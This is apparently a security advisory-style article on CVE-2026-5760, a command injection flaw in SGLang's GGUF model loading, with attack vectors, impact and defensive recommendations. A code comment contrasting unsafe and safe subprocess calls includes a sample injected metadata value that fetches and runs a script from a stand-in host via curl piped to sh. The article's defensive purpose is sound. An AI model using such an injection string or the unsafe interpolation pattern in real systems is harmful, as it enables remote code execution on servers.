# SGLang CVE-2026-5760 (CVSS 9.8) Enables Remote Code Execution via Malicious GGUF Model Files


A critical security flaw in SGLang, the widely deployed open-source large language model (LLM) serving framework, could allow attackers to achieve full remote code execution on inference servers by feeding the system a maliciously crafted GGUF model file. The vulnerability, tracked as CVE-2026-5760, carries a near-maximum CVSS score of 9.8 out of 10.0 and stems from a command injection flaw in how SGLang processes incoming model artifacts. For organizations running AI inference pipelines — whether on-premises, in cloud environments, or inside internal developer tooling — the vulnerability represents one of the more serious AI-infrastructure disclosures of the year.


## Background and Context


SGLang has become one of the go-to high-performance serving stacks for running large language models in production. Developed as an open-source project, it competes with frameworks such as vLLM and Hugging Face's Text Generation Inference (TGI), offering a programming model specifically tuned for structured generation, multi-modal workloads, and high-throughput batching. Its popularity has grown sharply over the past year as enterprises, AI startups, and research labs race to operationalize open-weight models including Llama, Qwen, Mistral, and DeepSeek derivatives — many of which ship in the GGUF format popularized by the llama.cpp ecosystem.


That ubiquity is exactly what makes CVE-2026-5760 consequential. SGLang deployments frequently sit on internal networks with access to GPU clusters, user data, and downstream business applications. A flaw enabling unauthenticated or weakly-authenticated code execution on such a server collapses the trust boundary between "model loader" and "production host," effectively turning a shared inference node into a staging ground for broader compromise.


The disclosure fits into an emerging pattern across 2025 and 2026, where vulnerabilities in AI tooling — Ray, MLflow, Triton, ComfyUI, and others — have demonstrated that the ML/AI stack often lags behind traditional web infrastructure in security hardening. CVE-2026-5760 is the latest entry in that list.


## Technical Details


Researchers describe CVE-2026-5760 as a command injection vulnerability leading to arbitrary code execution, triggered through the parsing or loading path for GGUF model files. GGUF (GPT-Generated Unified Format) is a container format used to package quantized LLM weights along with metadata such as tokenizer configuration, architecture hints, and chat templates. Because GGUF files are generally treated as opaque data blobs, downstream tooling frequently shells out to helper utilities or invokes subprocesses during load, convert, or quantization steps.
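The GGUF container opens with a small fixed header before the metadata key-value section. As an illustrative sketch (based on the publicly documented GGUF layout, not on SGLang's own loader), reading that header looks like this:

```python
import struct

def read_gguf_header(path: str) -> dict:
    """Read the fixed GGUF header: magic bytes, version, tensor count, metadata KV count."""
    with open(path, "rb") as f:
        magic = f.read(4)
        if magic != b"GGUF":
            raise ValueError(f"not a GGUF file: magic={magic!r}")
        # Little-endian: uint32 version, uint64 tensor_count, uint64 metadata_kv_count
        version, tensor_count, kv_count = struct.unpack("<IQQ", f.read(20))
    return {"version": version, "tensor_count": tensor_count, "metadata_kv_count": kv_count}
```

The metadata key-value pairs that follow this header — tokenizer settings, chat templates, architecture strings — are exactly the attacker-controlled fields at issue in this class of vulnerability.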


The vulnerability appears to exist in a code path where attacker-controlled content from the GGUF file — likely a metadata field, template string, or filename component — is interpolated into a shell command or process invocation without sufficient sanitization. An attacker who can cause SGLang to load a malicious GGUF file can therefore achieve execution in the context of the serving process. In most deployments, that context is a privileged service account with access to GPU devices, local model caches, and often to cloud credentials mounted into the container.
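SGLang's actual code path has not been published, but the general pattern is well understood. The sketch below is purely illustrative — the `gguf-convert` helper and the metadata field are hypothetical — and contrasts the vulnerable shell-interpolation idiom with a safer argument-list invocation:

```python
def convert_model_unsafe(metadata_name: str) -> str:
    # VULNERABLE pattern (illustrative): attacker-controlled metadata is interpolated
    # into a shell string. A metadata value like 'x"; curl evil.sh | sh; "' would
    # execute arbitrary commands if this string were passed to a shell.
    return f'gguf-convert --name "{metadata_name}" --out /models/cache'

def convert_model_safe(metadata_name: str) -> list:
    # Safer pattern: validate the field, then build an argument list that is passed
    # to subprocess.run(cmd) WITHOUT shell=True, so no shell ever parses the value.
    if not metadata_name.isprintable() or any(c in metadata_name for c in ';|&$`"\\'):
        raise ValueError("suspicious characters in model metadata")
    return ["gguf-convert", "--name", metadata_name, "--out", "/models/cache"]
```

The key design point is that the safe variant never concatenates untrusted data into a string a shell will parse; the value travels as a single argv entry regardless of its contents.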


Several attack vectors emerge from this class of flaw:


  • Direct upload: Environments that expose model-loading endpoints to end users (internal portals, research sandboxes, or "bring-your-own-model" SaaS) can be compromised by uploading a weaponized GGUF.
  • Supply-chain delivery: An attacker who pushes a trojanized model to a public hub such as Hugging Face could compromise any downstream SGLang deployment that pulls the model by name.
  • Cache poisoning: If an organization shares a model cache volume across clusters, a single malicious artifact can trigger execution on every server that subsequently loads it.

The CVSS 9.8 rating — consistent with network attack vector, low complexity, no privileges required, and high impact to confidentiality, integrity, and availability — underscores that exploitation does not require elevated access on the target system.


## Real-World Impact


The practical risk extends beyond the inference server itself. In a typical enterprise deployment, a compromised SGLang host is positioned to:


  • Exfiltrate proprietary fine-tuned weights and training data stored in adjacent volumes.
  • Harvest secrets such as Hugging Face tokens, cloud IAM credentials, and API keys for downstream services.
  • Pivot into internal networks via the model's outbound connectivity to monitoring, logging, or orchestration systems.
  • Manipulate model outputs — a subtle and potentially long-lived supply-chain attack against any application relying on the compromised endpoint.

For regulated industries deploying SGLang inside healthcare, finance, or legal workflows, the blast radius is particularly concerning. An RCE on an inference node that processes customer prompts could, depending on architecture, expose sensitive session data in transit through the model.


## Threat Actor Context


No in-the-wild exploitation has been publicly confirmed at the time of reporting. However, threat actors have increasingly targeted AI infrastructure. Groups tracked by researchers have previously exploited flaws in Ray, H2O.ai, and MLflow to mine cryptocurrency, steal proprietary models, or establish persistence inside AI-heavy organizations. Given the CVSS rating and the relative simplicity of weaponizing a GGUF payload, security teams should assume that proof-of-concept exploit code will surface quickly once technical write-ups circulate. Hugging Face's open model ecosystem — which hosts hundreds of thousands of GGUF files — provides a natural distribution channel for opportunistic attackers.


## Defensive Recommendations


Organizations running SGLang should treat CVE-2026-5760 as an urgent patching priority. Recommended actions include:


1. Upgrade immediately to the fixed SGLang release as soon as maintainers publish the patched version, and review release notes for the exact affected version range.

2. Audit model provenance. Only load GGUF files from trusted sources. Pin model versions by cryptographic hash rather than by tag or name to prevent silent substitution.

3. Isolate inference workloads. Run SGLang with the least privilege possible: a dedicated service account, read-only file systems where feasible, seccomp/AppArmor profiles, and network egress restricted to required destinations.

4. Segment the model cache. Avoid sharing writable model caches across untrusted tenants, clusters, or environments.

5. Monitor for anomalous process activity. Alert on unexpected child processes spawned by the SGLang server — shell binaries, curl/wget, or compilers are strong indicators of exploitation.

6. Restrict upload paths. If end users can submit model files, require signed artifacts, scan them in a sandbox before loading, and disable any "load arbitrary GGUF" features unless strictly required.

7. Rotate exposed secrets. If exploitation is suspected, rotate all credentials reachable from the inference host, including Hugging Face tokens and cloud role credentials.
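Hash pinning (recommendation 2) can be enforced with a small pre-load check. A minimal sketch, assuming the expected digest comes from your own provenance records rather than the model hub:

```python
import hashlib

def verify_model_digest(path: str, expected_sha256: str, chunk_size: int = 1 << 20) -> None:
    """Refuse to proceed if the model file's SHA-256 doesn't match the pinned digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        # Stream in chunks: GGUF files are often tens of gigabytes.
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    actual = h.hexdigest()
    if actual != expected_sha256:
        raise RuntimeError(f"model digest mismatch: expected {expected_sha256}, got {actual}")
```

Running this check before handing the file to the serving framework means a silently substituted artifact fails closed instead of reaching the vulnerable loading path.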


## Industry Response


The disclosure arrives amid a broader push to bring AI infrastructure under the same security discipline applied to traditional application stacks. CISA's recent guidance on securing AI systems, NIST's AI RMF, and emerging frameworks such as MITRE ATLAS all emphasize the need to treat models as untrusted input. Hugging Face has been steadily expanding its malware scanning and "pickle" detection capabilities, and several vendors now offer model-scanning tools specifically aimed at detecting malicious metadata and deserialization payloads.


Expect maintainers of adjacent frameworks — vLLM, TGI, llama.cpp bindings, and Ollama — to conduct similar audits of their GGUF handling paths. Security researchers are likely to publish deeper technical analyses in the coming weeks, and defenders should watch for Snort, Suricata, and EDR signatures targeting exploitation attempts against SGLang endpoints.


CVE-2026-5760 is a reminder that in the AI era, a model file is not just data — it is executable attack surface.


---

